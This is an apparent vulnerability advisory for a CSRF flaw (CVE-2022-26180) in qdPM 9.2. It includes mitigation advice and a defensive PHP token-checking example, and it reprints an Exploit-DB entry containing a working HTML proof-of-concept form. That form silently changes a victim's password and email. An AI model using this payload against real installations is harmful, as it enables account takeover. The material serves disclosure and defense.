Vendor: qdPM
By: Chetanya Sharma @AggressiveUser
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-site Request Forgery (CSRF))
Product Name: qdPM
Affected Version From: 9.2
Affected Version To: 9.2
Patch Exists: NO
Related CVE: CVE-2022-26180
CPE: a:qdpm:qdpm:9.2
Platforms Tested: KALI OS
2022

qdPM 9.2 – Cross-site Request Forgery (CSRF)

qdPM 9.2 is vulnerable to Cross-site Request Forgery (CSRF). An attacker can craft a malicious HTML file, host it, and send it to the victim. When the victim opens the file, the attacker can modify the victim's user account details.

Mitigation:

Implement CSRF protection mechanisms such as synchronizer tokens, same-site cookies, and anti-CSRF tokens.
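
The synchronizer-token and same-site cookie mitigations named above, as an added PHP example (not qdPM's code and not part of the advisory). The `_csrf_token` field name, the helper functions, the in-memory session array and both origins are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not qdPM code.
// SameSite=Lax keeps the session cookie off cross-site POSTs such as the PoC form.
session_set_cookie_params(['samesite' => 'Lax', 'secure' => true, 'httponly' => true]);

/** Issue (or reuse) the per-session synchronizer token to embed in each form. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Allow a state-changing request only with the session's token and, if the
 *  browser sent an Origin header, only when that origin is the application's. */
function csrf_check(array $session, array $post, array $server, string $ownOrigin): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['_csrf_token'] ?? '';   // hypothetical field name
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $ownOrigin;
}

// Constructed demo data: an in-memory session and POSTs to myAccount/update.
$ownOrigin = 'https://pm.example.test';         // placeholder origin
$session   = ['user_id' => 1];
$token     = csrf_token($session);
$fields    = ['sf_method' => 'put', 'users' => ['id' => '1', 'name' => 'Alice']];

$forged  = $fields;                             // shape of the PoC: no token
$genuine = $fields + ['_csrf_token' => $token]; // form rendered by the application

$cases = [
    'forged cross-site POST'  => [$forged,  ['HTTP_ORIGIN' => 'https://attacker.example']],
    'genuine same-site POST'  => [$genuine, ['HTTP_ORIGIN' => $ownOrigin]],
    'token with wrong origin' => [$genuine, ['HTTP_ORIGIN' => 'https://attacker.example']],
];
foreach ($cases as $label => [$post, $server]) {
    $ok = csrf_check($session, $post, $server, $ownOrigin);
    printf("%-24s %s\n", $label, $ok ? 'accepted' : 'rejected (HTTP 403)');
}
```

In a real handler the check runs before any account field is read, and a failed check ends the request without touching the user record.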

Exploit-DB raw data:

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------

Steps to Exploit:
	1) Make an HTML file of the given PoC (change the UserID field accordingly) and host it.
	2) Send it to the victim.

<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf&#95;method" value="put" />
      <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
      <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
      <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
      <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
      <input type="hidden" name="users&#91;photo&#93;" value="" />
      <input type="hidden" name="users&#91;culture&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>